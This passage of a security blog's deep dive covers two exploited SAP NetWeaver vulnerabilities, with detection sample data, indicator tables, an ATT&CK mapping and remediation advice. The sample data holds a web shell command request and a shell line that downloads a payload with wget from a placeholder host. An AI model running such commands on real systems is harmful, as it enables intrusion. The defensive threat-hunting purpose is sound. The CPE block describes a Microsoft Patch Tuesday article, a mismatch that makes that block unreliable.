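# Constructed sample data (TEST-NET addresses, made-up SID 'PRD'; not real traffic or hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2025:10:01:02 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/May/2025:10:01:09 +0000] "GET /irj/helper.jsp?cmd=id HTTP/1.1" 200 77',
    '198.51.100.4 - - [10/May/2025:10:02:00 +0000] "GET /irj/qpwoeiru.jsp HTTP/1.1" 200 40',
    '192.0.2.10 - - [10/May/2025:10:03:00 +0000] "GET /irj/portal HTTP/1.1" 200 9000',
]
SAMPLE_FILES = [
    "/usr/sap/PRD/J00/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp",
    "/usr/sap/PRD/J00/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync/qwertyui.jsp",
    r"C:\usr\sap\PRD\J00\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\index.jsp",
    "/usr/sap/PRD/J00/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/Portal.jsp.bak",
]
SAMPLE_EVENTS = [
    ProcEvent("prdadm", "java", "sh", "sh -c 'wget http://203.0.113.9/config -O /tmp/config'"),
    ProcEvent("prdadm", "sh", "whoami", "whoami"),
    ProcEvent("prdadm", "java", "jstart", "jstart pf=/usr/sap/PRD/SYS/profile/PRD_J00_host"),
]
```

Feed real access-log lines, a find -ls listing and EDR process records into the three scan functions; the 'shortname' verdict is intentionally kept out of the log check because legitimate short .jsp names would otherwise flood it.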

No single mitigation or detection technique is a silver bullet. The sophistication and multi-stage nature of these attacks necessitate a layered defense strategy. This includes not only preventative measures like patching and hardening but also robust detective capabilities across network, endpoint, and application layers, coupled with proactive threat hunting. The emphasis on applying both SAP Security Notes 3594142 and 3604119 underscores this principle: one note closes the unauthenticated external door, while the other addresses a vulnerability exploitable by an already privileged entity.

Furthermore, generic security tools may not always possess the nuanced understanding required to effectively monitor and protect complex SAP environments. Organizations with significant SAP deployments should consider augmenting their general security stack with SAP-specific security solutions and threat intelligence feeds from specialized vendors who focus on this ecosystem.12

Table: Key Indicators of Compromise (IoCs) for Detection

The following table consolidates key Indicators of Compromise (IoCs) derived from observed attacker TTPs. Security teams can use this information to inform their threat hunting activities and configure monitoring tools.

| IoC Category | Examples / Description | Relevant Sources |
|---|---|---|
| Network Activity | Suspicious HTTP POST requests to /developmentserver/metadatauploader. HTTP GET requests to .jsp files (e.g., helper.jsp?cmd=id, cache.jsp, coreasp.js, randomly named .jsp files) often containing command parameters. C2 traffic to known malicious IP addresses such as 47.97.42[.]177, 8.210.65[.]56 (associated with Chaya_004), 15.204.56[.]106 (opendir with compromised list), 43.247.135[.]53 (CL-STA-0048 C2). | 2 |
| File System Artifacts | Web shells: helper.jsp, cache.jsp, ssonkfrd.jsp, cglswdjp.jsp, rrx.jsp, dyceorp.jsp, coreasp.js, ran.jsp, other randomly named 8-character [a-z]{8}.jsp files. Malicious ELF binary named “config”. Shell script config.sh. | 2 |
| File System Artifacts (paths) | Common Paths: …/irj/servlet_jsp/irj/root/, …/irj/servlet_jsp/irj/work/, …/irj/servlet_jsp/irj/work/sync/ (and Windows equivalents: C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\…) | 6 |
| Malicious IPs / Domains | 47.97.42[.]177, 8.210.65[.]56, 49.232.93[.]226 (Chaya_004 infrastructure). 15.204.56[.]106 (attacker opendir). 43.247.135[.]53 (CL-STA-0048 C2). ocr-freespace[.]xyz (payload download). http://search-email[.]com:443/ServiceLogin/_/kids/signup/eligible (historic C2). | 2 |
| Suspicious Process Activity | SAP server processes (e.g., java.exe on Windows, corresponding Java processes on Linux) spawning child processes such as cmd.exe, sh, curl, wget. Execution of reconnaissance commands (whoami, net user, ipconfig/ifconfig, ps, ls, id, hostname, netstat, nltest) by the SAP system user account. Unexpected processes associated with known attacker tools like Brute Ratel, SuperShell, KrustyLoader, Sliver, Cobalt Strike. | 5 |

7. Mapping the Threat: Alignment with MITRE ATT&CK®

The MITRE ATT&CK® framework provides a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Mapping the observed attacker behaviors associated with the exploitation of CVE-2025-31324 and CVE-2025-42999 to this framework helps in understanding the attack lifecycle in a standardized way and aids in prioritizing defensive measures.

The attackers leveraging these SAP vulnerabilities have demonstrated proficiency across a wide array of ATT&CK tactics, indicating a level of sophistication characteristic of mature and resourceful threat actors. This breadth of TTPs moves beyond simple opportunistic exploitation.

Observed Attacker Behaviors Mapped to ATT&CK Tactics & Techniques:

  • Reconnaissance (TA0043):
      • Activity includes scanning for vulnerable SAP instances using tools like Nuclei.5 Threat actor Chaya_004 utilizes asset reconnaissance modules such as Hunter, Fofa, and Quake.2
  • Initial Access (TA0001):
      • T1190 – Exploit Public-Facing Application: This is the primary initial access vector, involving the direct exploitation of CVE-2025-31324 on internet-facing SAP NetWeaver Visual Composer instances.15
  • Execution (TA0002):
      • T1059.007 – Command and Scripting Interpreter: Java: Central to the attack, as attackers execute JSP web shells on the SAP Java application server.6
      • T1059.003 – Command and Scripting Interpreter: Windows Command Shell: Web shells are used to execute cmd.exe commands on Windows-based SAP servers.6
      • T1059.004 – Command and Scripting Interpreter: Unix Shell: Similarly, sh or bash commands are executed via web shells on Linux-based SAP systems.26
  • Persistence (TA0003):
      • T1505.003 – Server Software Component: Web Shell: The deployment of various JSP web shells (e.g., helper.jsp, cache.jsp, randomly named files, coreasp.js) in SAP application directories provides attackers with sustained access to compromised systems.1
      • KrustyLoader, deployed by UNC5221, is capable of setting up persistence, potentially via scheduled tasks or services.5
  • Privilege Escalation (TA0004):
      • T1068 – Exploitation for Privilege Escalation: The chaining of CVE-2025-31324 (gaining initial RCE as the SAP application user, e.g., <SID>ADM) with CVE-2025-42999 (requiring privileged access to trigger insecure deserialization) can be seen as a form of privilege escalation or consolidation of control.1 The Brute Ratel framework has also been used for privilege escalation.27
  • Defense Evasion (TA0005):
      • T1027 – Obfuscated Files or Information: The use of tools like Garble to obfuscate ELF binaries (e.g., the config binary used by Chaya_004) aims to hinder analysis.6
      • T1027.009 – Embedded Payloads: The Brute Ratel framework is known to load and decrypt embedded malicious payloads.27
      • T1622 – Debugger Evasion (Heaven’s Gate): The Heaven’s Gate technique was reportedly employed to bypass endpoint defenses.7
      • T1218.007 – Signed Binary Proxy Execution: Msbuild: Reports indicate code injection into dllhost.exe using MSBuild for stealthy execution.30
      • Fileless Execution: The coreasp.js web shell dynamically defines and loads Java classes in memory, avoiding disk writes to evade file-based detection.26
  • Credential Access (TA0006):
      • The Brute Ratel framework has capabilities for credential theft, which attackers may leverage post-compromise.27
  • Discovery (TA0007):
      • T1082 – System Information Discovery: Attackers execute commands like whoami, hostname, uname to gather basic system details.6
      • T1057 – Process Discovery: Commands such as ps are used to list running processes.6
      • T1049 – System Network Connections Discovery: netstat is used to identify active network connections.6
      • T1033 – System Owner/User Discovery: id and whoami commands reveal user context.6
      • T1482 – Domain Trust Discovery: nltest has been observed, often used to enumerate domain trust relationships.9
      • T1087.001 – Account Discovery: Local Account: net user commands are used to list local user accounts.6
      • Attackers also perform SAP-specific discovery, mapping applications and backup details.26
  • Command and Control (TA0011):
      • T1105 – Ingress Tool Transfer: Attackers download post-exploitation tools such as Brute Ratel C4, SuperShell, KrustyLoader, and various scripts onto compromised systems.2
      • T1090 – Proxy: Use of reverse SSH SOCKS proxies for C2.6 The NPS tool, an intranet penetration proxy, is also used.2
      • T1071.001 – Application Layer Protocol: Web Protocols: Web shells inherently communicate over HTTP/S. SuperShell is a web-based C2 interface.2
      • T1573.002 – Encrypted Channel: Asymmetric Cryptography: Use of SoftEther VPN for secure C2 communications.2
  • Impact (TA0040):
      • T1499.004 – Endpoint Denial of Service: Application Exhaustion Flood: Service disruption through corruption of UDDI entries has been noted as a potential impact.2
      • T1486 – Data Encrypted for Impact: The potential for ransomware deployment on compromised SAP systems is a significant concern.7

The specific focus on defense evasion techniques like Heaven’s Gate, obfuscation, and fileless execution highlights a clear intent by attackers to operate stealthily and circumvent common security controls. This makes detection more challenging and shifts the emphasis towards behavior-based and anomaly detection capabilities, rather than relying solely on signature-based methods.

Furthermore, while attackers employ custom tools, many discovery commands are standard OS utilities. When executed under the context of a legitimate SAP server process (e.g., java.exe), distinguishing malicious “Living off the Land” (LotL) activity from benign administrative tasks becomes difficult without proper behavioral baselining and correlation with other indicators of compromise.

Table: Observed MITRE ATT&CK® Techniques

The following table summarizes some of the key ATT&CK techniques observed in the exploitation of these SAP vulnerabilities:

| Tactic | Technique ID | Technique Name | Relevance to SAP Attacks (Brief Description & Sources) |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Exploitation of CVE-2025-31324 on SAP NetWeaver Visual Composer endpoint /developmentserver/metadatauploader. 15 |
| Execution | T1059.007 | Command and Scripting Interpreter: Java | Execution of JSP web shells (helper.jsp, cache.jsp, etc.) to run commands on the SAP Java server. 6 |
| Persistence | T1505.003 | Server Software Component: Web Shell | Deployment of various web shells (JSP, coreasp.js) for sustained access in SAP directories. 1 |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Chaining CVE-2025-31324 with CVE-2025-42999 for privileged RCE; Brute Ratel used for privilege escalation. 1 |
| Defense Evasion | T1027 | Obfuscated Files or Information | Garble used for ELF binary obfuscation to hinder analysis. 6 |
| Defense Evasion | T1622 | Debugger Evasion (Heaven’s Gate) | Heaven’s Gate technique employed to bypass endpoint defenses. 7 |
| Discovery | T1082 | System Information Discovery | Attackers running commands like whoami, ipconfig, hostname to gather system details post-compromise. 6 |
| Command and Control | T1105 | Ingress Tool Transfer | Downloading post-exploitation tools like Brute Ratel C4, SuperShell, KrustyLoader. 5 |
| Command and Control | T1090 | Proxy | Use of reverse SSH SOCKS proxies; NPS proxy for C2. 6 |
| Impact | T1486 | Data Encrypted for Impact | Potential deployment of ransomware on compromised SAP systems, encrypting critical business data. 7 |

8. Urgent Call to Action: Key Takeaways and Strategic Recommendations

The active exploitation of CVE-2025-31324 and CVE-2025-42999 in SAP NetWeaver Visual Composer presents a clear and present danger to organizations worldwide. The combination of critical severity, sophisticated threat actor involvement, and the potential for complete system compromise necessitates an immediate and comprehensive response.

Recap of Critical Risks:

  • Two severe, actively exploited zero-day vulnerabilities (CVE-2025-31324 with CVSS 10.0 and CVE-2025-42999 with CVSS 9.1) affect a core SAP component.
  • Highly capable threat actors, including China-nexus APT groups, alongside opportunistic attackers, are leveraging these flaws.
  • The vulnerabilities can be chained to achieve unauthenticated remote code execution, leading to full control over targeted SAP systems.
  • This poses a high risk of catastrophic data breaches, deployment of ransomware, severe operational disruption, and state-sponsored espionage, particularly impacting critical infrastructure and manufacturing sectors.

Top-Priority Actions:

  1. Immediate and Comprehensive Patching: This is the paramount action.
      • Apply SAP Security Note 3594142 to address CVE-2025-31324.
      • Critically, also apply SAP Security Note 3604119 to address CVE-2025-42999. Both notes are required for full mitigation.
      • For older, unsupported SAP NetWeaver versions (7.0-7.40), implement the workarounds detailed in SAP KBA 3593336 as a matter of urgency.
  2. Proactive and Thorough Threat Hunting: Due to exploitation preceding patch availability, organizations must assume potential compromise if their systems were exposed.
      • Conduct intensive scans for Indicators of Compromise (IoCs), including known web shell names and patterns, suspicious files in SAP directories, anomalous process activity, and unexpected network connections.
      • Utilize tools such as the open-source IoC scanner provided by Onapsis and Mandiant.
  3. System Hardening and Attack Surface Reduction:
      • If SAP NetWeaver Visual Composer (VCFRAMEWORK) is not actively used, disable or uninstall it.
      • Strictly limit network access to the /developmentserver/metadatauploader endpoint using firewalls or SAP Web Dispatcher.
      • Implement and enforce robust network segmentation to isolate SAP systems.
  4. Enhanced Monitoring and Detection Capabilities:
      • Ensure SAP system logs (web server, application, security audit) are forwarded to a centralized SIEM for continuous monitoring and correlation.
      • Deploy and update NIDS/HIDS signatures and EDR rules specific to these vulnerabilities and associated attacker TTPs.
      • Establish baselines for normal SAP server behavior and monitor for deviations, particularly anomalous process creations or network activity originating from SAP processes.

Strategic Recommendations for Long-Term Resilience:

The current threat landscape targeting SAP systems is a stark reminder that these core enterprise applications are high-value targets. Addressing these specific vulnerabilities is not merely a tactical IT task; it is a business risk management imperative that requires C-level visibility and support due to the potential for severe impact on core operations and “crown jewel” data.

  • Improve SAP Security Posture Management: Implement a continuous process for reviewing SAP system configurations, installed components (especially add-ons like Visual Composer), and user authorizations. Eliminate or secure unused but potentially vulnerable components.
  • Invest in SAP-Specific Security Expertise and Tools: Generic security measures may not provide sufficient visibility or protection for the complexities of SAP environments. Organizations should consider investing in specialized SAP security solutions, threat intelligence feeds, and personnel training.
  • Strengthen Incident Response Plans for SAP: Ensure that incident response playbooks specifically address the compromise of critical SAP systems. This includes procedures for containment, eradication, recovery, forensic analysis of SAP logs and artifacts, and business continuity.
  • Foster Collaboration and Information Sharing: The rapid discovery and dissemination of threat information by security vendors, researchers, and agencies were crucial in responding to these zero-days. Organizations should actively participate in and consume intelligence from industry-specific ISACs, security communities, and vendor briefings. The “second wave” of attacks demonstrates that threats persist and evolve, making shared intelligence vital.

The tactics observed in these incidents—chaining vulnerabilities, sophisticated C2 mechanisms, and advanced defense evasion techniques—suggest that attackers are becoming increasingly adept at exploiting complex enterprise applications like SAP. This is likely an enduring trend, requiring ongoing adaptation, investment, and vigilance from defenders.

Complacency is not an option when protecting the digital heart of an enterprise. Proactive defense, rapid and thorough response, and a commitment to continuous security improvement are essential to safeguard critical SAP assets from these and future advanced threats.

Works cited

  1. SAP releases patch for second zero-day vulnerability in NetWeaver …, accessed May 14, 2025, https://www.techzine.eu/news/security/131374/sap-releases-patch-for-second-zero-day-vulnerability-in-netweaver/
  2. Threat Analysis: SAP Vulnerability Exploited in the Wild by Chinese Threat Actor – Forescout, accessed May 14, 2025, https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/
  3. Vulnerability — Latest News, Reports & Analysis | The Hacker News, accessed May 14, 2025, https://thehackernews.com/search/label/Vulnerability
  4. SAP NetWeaver exploitation enters second wave of threat activity …, accessed May 14, 2025, https://www.cybersecuritydive.com/news/sap-netweaver-exploitation-second-wave/747661/
  5. China-Linked APTs Exploit SAP CVE-2025-31324 to Breach 581 Critical Systems Worldwide – The Hacker News, accessed May 14, 2025, https://thehackernews.com/2025/05/china-linked-apts-exploit-sap-cve-2025.html
  6. Threat Brief: CVE-2025-31324 – Palo Alto Networks Unit 42, accessed May 14, 2025, https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/
  7. CVE-2025-31324 Detection: SAP NetWeaver Zero-Day Under Active Exploitation Exposes Critical Systems to Remote Code Execution | SOC Prime, accessed May 14, 2025, https://socprime.com/blog/detect-cve-2025-31324-exploitation-attempts/
  8. Actively Exploited SAP NetWeaver Visual Composer Vulnerability Enables Remote Code Execution (CVE-2025-31324) – SonicWall, accessed May 14, 2025, https://www.sonicwall.com/blog/actively-exploited-sap-netweaver-visual-composer-vulnerability-cve-2025-31324
  9. Active Exploitation of SAP NetWeaver Visual Composer CVE-2025 …, accessed May 14, 2025, https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/
  10. Chinese hackers exploit SAP vulnerability – Techzine Europe, accessed May 14, 2025, https://www.techzine.eu/news/security/131281/chinese-hackers-exploit-sap-vulnerability/
  11. SAP Security Notes: May 2025 Patch Day – Onapsis, accessed May 14, 2025, https://onapsis.com/blog/sap-security-patch-day-may-2025/
  12. SAP Security Patch Day – May 2025 – SecurityBridge, accessed May 14, 2025, https://securitybridge.com/blog/sap-security-patch-day-may-2025/
  13. CVE-2025-42999 – Insecure Deserialization in SAP NetWeaver (Visual Composer development server) – SecAlerts, accessed May 14, 2025, https://secalerts.co/vulnerability/CVE-2025-42999
  14. Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324), accessed May 14, 2025, https://www.helpnetsecurity.com/2025/04/28/sap-netweaver-cve-2025-31324-exploited/
  15. A Vulnerability in SAP NetWeaver Visual Composer Could Allow for Remote Code Execution | Office of Information Technology Services, accessed May 14, 2025, https://its.ny.gov/2025-044
  16. How to Defend Against CVE-2025-31324: Critical SAP Zero-Day, accessed May 14, 2025, https://onapsis.com/threat-research/cve-2025-31324/
  17. CVE-2025-31324: Active Exploitation of SAP Vulnerability – SecurityBridge, accessed May 14, 2025, https://securitybridge.com/blog/cve-2025-31324/
  18. ReliaQuest Uncovers New Critical Vulnerability in SAP NetWeaver, accessed May 14, 2025, https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
  19. Critical Zero-Day Vulnerability in SAP NetWeaver – NHS England Digital, accessed May 14, 2025, https://digital.nhs.uk/cyber-alerts/2025/cc-4649
  20. SAP Zero Day Vulnerability CVE-2025-31324 / Security Note 3594142, accessed May 14, 2025, https://layersevensecurity.com/sap-zero-day-vulnerability-cve-2025-31324-security-note-3594142
  21. CVE-2025-42999 | Tenable®, accessed May 14, 2025, https://www.tenable.com/cve/CVE-2025-42999
  22. CVE-2025-42999 – Exploits & Severity – Feedly, accessed May 14, 2025, https://feedly.com/cve/CVE-2025-42999
  23. CVE-2025-42999 – vulnerability database, accessed May 14, 2025, https://vulners.com/cve/CVE-2025-42999
  24. SAP Patches Another Critical NetWeaver Vulnerability – SecurityWeek, accessed May 14, 2025, https://www.securityweek.com/sap-patches-another-critical-netweaver-vulnerability/
  25. CVE-2025-31324: SAP NetWeaver Remote Code Execution Vulnerability Explained, accessed May 14, 2025, https://www.picussecurity.com/resource/blog/cve-2025-31324-sap-netweaver-remote-code-execution
  26. China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures – EclecticIQ Blog, accessed May 14, 2025, https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
  27. Threat Actors Hacking SAP Critical Zero-Day – BankInfoSecurity, accessed May 14, 2025, https://www.bankinfosecurity.com/threat-actors-hacking-sap-critical-zero-day-a-28098
  28. SAP vulnerability | CVE-2025-31324 – Stormshield, accessed May 14, 2025, https://www.stormshield.com/news/security-alert-sap-cve-2025-31324-stormshield-products-response/
  29. Critical vulnerability in SAP NetWeaver under threat of active …, accessed May 14, 2025, https://www.cybersecuritydive.com/news/critical-vulnerability-sap-netweaver-exploitation/746383/
  30. Critical Zero-Day Vulnerability in SAP NetWeaver Visual Composer: CVE-2025-31324 Exploited in Manufacturing Attacks – Rescana, accessed May 14, 2025, https://www.rescana.com/post/critical-zero-day-vulnerability-in-sap-netweaver-visual-composer-cve-2025-31324-exploited-in-manufa
  31. Netizen: Monday Security Brief (4/28/2024), accessed May 14, 2025, https://www.netizen.net/news/post/6280/netizen-monday-security-brief-4-28-2024
  32. Over 1,200 SAP NetWeaver servers vulnerable to actively exploited flaw, accessed May 14, 2025, https://www.bleepingcomputer.com/news/security/over-1-200-sap-netweaver-servers-vulnerable-to-actively-exploited-flaw/
  33. Exploited Vulnerability Exposes Over 400 SAP NetWeaver Servers to Attacks, accessed May 14, 2025, https://www.securityweek.com/exploited-vulnerability-exposes-over-400-sap-netweaver-servers-to-attacks/
  34. Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell, accessed May 14, 2025, https://thehackernews.com/2025/05/chinese-hackers-exploit-sap-rce-flaw.html
  35. Indicators of Compromise Scanner for SAP Zero-Day (CVE-2025-31324) – Onapsis, accessed May 14, 2025, https://onapsis.com/blog/indicators-of-compromise-scanner-for-sap-zero-day-cve-2025-31324/
  36. Russian Military Cyber Actors Target US and Global Critical Infrastructure – CISA, accessed May 14, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a
  37. Critical vulnerability in SAP NetWeaver enables malicious file uploads – Red Canary, accessed May 14, 2025, https://redcanary.com/blog/threat-intelligence/cve-2025-31324/
  38. 3593336 – Unfamiliar files found in SAP NetWeaver Java file system – SAP Support Portal, accessed May 14, 2025, https://userapps.support.sap.com/sap/support/knowledge/en/3593336
  39. Critical SAP NetWeaver Vulnerability Exposed: Hackers Suspected of Zero-Day Exploitation, accessed May 14, 2025, https://www.betterworldtechnology.com/post/sap-netweaver-vulnerability-zero-day

We warned you it was deep. You aren't earning those CPE credits for nothing!


Continuing Professional Education (CPE) Credit

Earn CPE credits for reading this Security Blotter article. All Security Blotter articles that come with a Deep Dive section are eligible to earn free CPEs for you, the reader.  Our articles include all issues, incidents, and bulletins to relevant Infosec standards and best practices. We have documented your CPE submission below for your convenience and because we love you (in a platonic way).

Earn CPE credits for reading this Security Blotter article. This piece provides practical and technical insight into zero-day vulnerabilities, privilege escalation, and remote code execution threats targeting core Windows components. It is suitable for professionals maintaining credentials in cybersecurity, risk management, and incident response.

Article Overview

This article provides an in-depth analysis of Microsoft’s May 2025 Patch Tuesday, including the exploitation of five zero-day vulnerabilities, attacker tradecraft, detection strategies, sector-specific mitigation guidance, and prioritization tactics. The content aligns with core topics across security operations, incident response, governance, and software security domains.

🧾 CPE Submission Details

| Certification | CPEs Earned | Domains Covered | Reporting URL | Description |
|---|---|---|---|---|
| CISSP (ISC2) | 0.75 | Domain 1 (Security & Risk Management), Domain 6 (Security Assessment and Testing), Domain 7 (Security Operations) | https://cpe.isc2.org | May 2025 Patch Tuesday: Five Zero-Days Already Exploited, Critical Bugs Demand Action |
| CISM (ISACA) | 0.75 | Domain 1 (Information Security Governance), Domain 2 (Information Risk Management) | https://www.isaca.org | May 2025 Patch Tuesday: Five Zero-Days Already Exploited, Critical Bugs Demand Action |
| CEH (EC-Council) | 0.75 | Domain 2 (Information Security Threats and Attack Vectors), Domain 3 (Security Controls and Defense Mechanisms) | https://www.eccouncil.org | May 2025 Patch Tuesday: Five Zero-Days Already Exploited, Critical Bugs Demand Action |

📝 Additional Notes

  • Other Certifications: This article may qualify for CPE credit with other certifications that recognize professional security education, including CompTIA Security+, GIAC, and vendor-specific programs.

  • Disclaimer: Certification holders are responsible for confirming eligibility with their respective certifying bodies. Security Blotter is not affiliated with ISC2, ISACA, EC-Council, or any certification organization and cannot assist with audit documentation or CPE disputes.

  • Record Keeping: Save a local copy or PDF of this article, along with your notes or reflections, in case of a future CPE audit.

  • Content Removal Notice: Security Blotter reserves the right to update or remove articles at any time.

    The Shorter Version

    Two zero-day vulnerabilities—CVE-2025-31324 and CVE-2025-42999—are actively being exploited to hijack SAP NetWeaver environments across manufacturing, government, and critical infrastructure sectors. Sophisticated China-nexus APTs are chaining the flaws to gain complete system control. If you’re running SAP NetWeaver, this is your alarm bell: patch, hunt, and harden now.


    SAP at Risk: The Bigger Picture

    SAP isn’t just enterprise software—it’s the nervous system of global commerce. When it breaks, entire companies grind to a halt. Unfortunately, that’s exactly the scenario unfolding now, thanks to two actively exploited zero-day vulnerabilities in SAP NetWeaver Visual Composer: CVE-2025-31324 and CVE-2025-42999.

    Both are critical. Both are under attack. And both are being used by advanced threat actors—including state-sponsored groups linked to China—to gain full, unauthenticated control of SAP systems. These aren’t hypothetical risks; they’re battlefield reports. Patching is essential—but it’s not enough. You need to assume breach, hunt for backdoors, and shore up defenses.

    Understanding Critical SAP Vulnerabilities

    Exploitation Process Explained

    Step 1

    Initial Access

    Attackers exploit CVE-2025-31324 to upload a malicious JSP web shell, gaining unauthorized access to the system.

    Step 2

    Web Shell Execution

    Once the web shell is in place, attackers execute OS-level commands to establish persistent access and control.

    Step 3

    Privilege Escalation

    By leveraging CVE-2025-42999, attackers further escalate their privileges, allowing deeper system infiltration and potential data exfiltration.

    Global Exposure of SAP Systems

    Vulnerable Systems

    Over 1,200 SAP systems are exposed online, with hundreds already compromised. These systems are primarily located in the U.S., India, Australia, Germany, and China.

    Confirmed Targeted Sectors

    Industries such as Manufacturing, Energy, Oil & Gas, Government, Media, Pharmaceuticals, Retail, and Fortune 500 companies are at significant risk.

    The Limitations of Patching

    Why Patching Isn't Enough

    While patching is crucial, it only closes the door after potential intruders have entered. The timeline of events shows that exploits were active in the wild for weeks before patches were released. If your system was exposed during this time, it may already be compromised. Patching alone does not address the need for thorough threat hunting and system hardening to ensure ongoing security.

    Immediate Security Actions

    Patch Deployment

    Apply SAP Security Note 3594142 for CVE-2025-31324 and SAP Security Note 3604119 for CVE-2025-42999. For NetWeaver 7.0–7.40, follow SAP KBA 3593336 for manual workarounds.

    Threat Hunting

    Conduct searches for suspicious .jsp files and monitor logs for unusual HTTP requests. Review recent process executions by SAP server accounts and check for outbound C2 traffic to known malicious IPs.

    System Hardening

    Disable unused features like Visual Composer, block specific paths via ACL or Web Dispatcher, segment SAP systems from other networks, and forward all SAP logs to your SIEM for continuous analysis.

    Want the nitty-gritty detail?

    Read the Security Blotter Deep Dive. Expand the red section at the top of the page.

    Panic Less.  Patch More.